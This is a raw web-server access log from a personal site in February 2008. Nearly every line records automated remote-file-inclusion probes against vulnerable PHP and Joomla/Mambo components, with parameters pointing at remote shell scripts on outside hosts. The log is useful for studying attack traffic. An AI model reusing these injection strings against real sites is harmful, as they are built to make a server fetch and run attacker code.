217.22.61.3 - - [21/Feb/2008:09:14:58 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:15:02 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:15:02 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:15:03 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:15:03 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:15:03 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:15:03 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.50.208.5 - - [21/Feb/2008:09:15:23 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.6 - - [21/Feb/2008:09:15:23 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.9 - - [21/Feb/2008:09:15:24 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.10 - - [21/Feb/2008:09:15:25 -0800] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.10 - - [21/Feb/2008:09:15:25 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:15:25 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.50.208.8 - - [21/Feb/2008:09:15:26 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:09:15:26 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:09:15:36 -0800] "GET /index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:09:15:36 -0800] "GET /logs/index.php?option=com_thopper&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.50.208.9 - - [21/Feb/2008:09:15:55 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.6 - - [21/Feb/2008:09:15:56 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:16:07 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.61.3 - - [21/Feb/2008:09:16:08 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:09:16:11 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [21/Feb/2008:09:16:12 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:09:16:25 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.115.110.146 - - [21/Feb/2008:09:16:25 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:09:16:36 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
211.233.19.105 - - [21/Feb/2008:09:16:37 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
207.218.206.37 - - [21/Feb/2008:09:17:05 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:17:16 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:17:16 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
87.106.137.91 - - [21/Feb/2008:09:17:39 -0800] "GET /logs//index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
87.106.137.91 - - [21/Feb/2008:09:17:39 -0800] "GET //index.php?option=com_mtree&Itemid=&mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
208.50.208.3 - - [21/Feb/2008:09:18:20 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.10 - - [21/Feb/2008:09:18:23 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://nocsom.org/images/IDsafeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.70.28.42 - - [21/Feb/2008:09:18:24 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "ia_archiver-web.archive.org" "www.dmulk.com"
66.232.156.215 - - [21/Feb/2008:09:18:29 -0800] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.232.156.215 - - [21/Feb/2008:09:18:30 -0800] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:09:18:37 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:09:18:37 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
66.232.156.215 - - [21/Feb/2008:09:18:39 -0800] "GET //mcf.php?content=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.232.156.215 - - [21/Feb/2008:09:18:39 -0800] "GET /logs//mcf.php?content=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:09:19:03 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:09:19:06 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
217.13.86.10 - - [21/Feb/2008:09:19:16 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://x.apescar.net/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [21/Feb/2008:09:19:17 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://x.apescar.net/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.10 - - [21/Feb/2008:09:19:17 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://x.apescar.net/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.50.14.189 - - [21/Feb/2008:09:19:56 -0800] "GET /logs/access_080126.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgo.at/tmp/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.42.226 - - [21/Feb/2008:09:20:15 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tuidang.net/skin1/main/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:09:22:08 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.teamswanee.com/calendar/docs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:09:22:15 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.teamswanee.com/calendar/docs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:09:22:52 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:09:22:52 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.97.20 - - [21/Feb/2008:09:22:53 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.174.65.31 - - [21/Feb/2008:09:23:08 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [21/Feb/2008:09:23:09 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [21/Feb/2008:09:23:10 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.90.250 - - [21/Feb/2008:09:23:33 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.crazyteamclub.com/portal/administrator/components/com_phpshop/languages/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.90.250 - - [21/Feb/2008:09:23:33 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.crazyteamclub.com/portal/administrator/components/com_phpshop/languages/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.90.250 - - [21/Feb/2008:09:23:33 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.crazyteamclub.com/portal/administrator/components/com_phpshop/languages/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.90.250 - - [21/Feb/2008:09:23:35 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.crazyteamclub.com/portal/administrator/components/com_phpshop/languages/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.143 - - [21/Feb/2008:09:23:35 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://img.mehriz.org/image/img/e235cdcfad3f39d87a1d43e772b74e58/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.143 - - [21/Feb/2008:09:23:36 -0800] "GET /logs//include.php?path[docroot]=http://img.mehriz.org/image/img/e235cdcfad3f39d87a1d43e772b74e58/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [21/Feb/2008:09:23:43 -0800] "GET /logs/access_071231.log//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.geocities.com/rose_love284/sikat.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.12.116.5 - - [21/Feb/2008:09:23:49 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.12.116.5 - - [21/Feb/2008:09:23:49 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.12.116.5 - - [21/Feb/2008:09:23:49 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.12.116.5 - - [21/Feb/2008:09:23:51 -0800] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:09:23:53 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.teamswanee.com/calendar/docs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
217.22.60.11 - - [21/Feb/2008:09:24:29 -0800] "GET /index1.php?site=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.236 - - [21/Feb/2008:09:24:42 -0800] "GET /bikes/dteel/2008_02_15/ HTTP/1.0" 200 1118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.174.65.31 - - [21/Feb/2008:09:24:44 -0800] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.183.41 - - [21/Feb/2008:09:25:04 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.teamswanee.com/calendar/docs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:09:25:19 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
82.146.33.210 - - [21/Feb/2008:09:25:19 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
70.85.198.234 - - [21/Feb/2008:09:25:27 -0800] "GET //?mosConfig_absolute_path=http://www.pricetrim.com/counter/auction.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.51.176 - - [21/Feb/2008:09:25:37 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.204.137.107 - - [21/Feb/2008:09:25:57 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.156.215 - - [21/Feb/2008:09:25:57 -0800] "GET //config/dbutil.bck.php?confdir=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
66.232.156.215 - - [21/Feb/2008:09:25:57 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
219.94.162.186 - - [21/Feb/2008:09:26:42 -0800] "GET /logs/index2.php?option=com_bsq_sitestats§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
219.94.162.186 - - [21/Feb/2008:09:26:43 -0800] "GET /index2.php?option=com_bsq_sitestats§ion=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:09:27:12 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
202.60.64.18 - - [21/Feb/2008:09:27:12 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
87.230.18.83 - - [21/Feb/2008:09:27:22 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.123.27.136 - - [21/Feb/2008:09:28:13 -0800] "GET /logs/access_080203.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.58.165 - - [21/Feb/2008:09:28:18 -0800] "GET /logs/access_080117.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.13.86.10 - - [21/Feb/2008:09:28:43 -0800] "GET /logs/access_080211.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://x.apescar.net/if?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.24.203 - - [21/Feb/2008:09:28:44 -0800] "GET /megumi/?D=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.58.187 - - [21/Feb/2008:09:29:30 -0800] "GET /logs/ HTTP/1.0" 200 35528 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.33.49.76 - - [21/Feb/2008:09:29:59 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.clanwac.co.uk/tmp/.../.../cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.27 - - [21/Feb/2008:09:30:16 -0800] "GET /logs/access_080211.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [21/Feb/2008:09:30:16 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.218.206.37 - - [21/Feb/2008:09:30:26 -0800] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.218.206.37 - - [21/Feb/2008:09:30:32 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:09:31:02 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:31:03 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
222.96.156.153 - - [21/Feb/2008:09:31:04 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:09:31:05 -0800] "GET /logs/access_080121.log/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:09:31:11 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.113 - - [21/Feb/2008:09:31:13 -0800] "GET /logs/access_071120.log HTTP/1.0" 200 34560 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.152 - - [21/Feb/2008:09:31:23 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.218.206.37 - - [21/Feb/2008:09:32:16 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [21/Feb/2008:09:32:22 -0800] "GET /logs/access_080103.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:09:33:11 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:09:33:13 -0800] "GET /logs/access_080121.log/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:09:33:13 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.255.149 - - [21/Feb/2008:09:34:03 -0800] "GET /logs/access_080110.log/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:09:35:03 -0800] "GET /index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:09:35:05 -0800] "GET /logs/access_080121.log/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:09:35:06 -0800] "GET /logs/index.php?option=com_nhanhieu&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
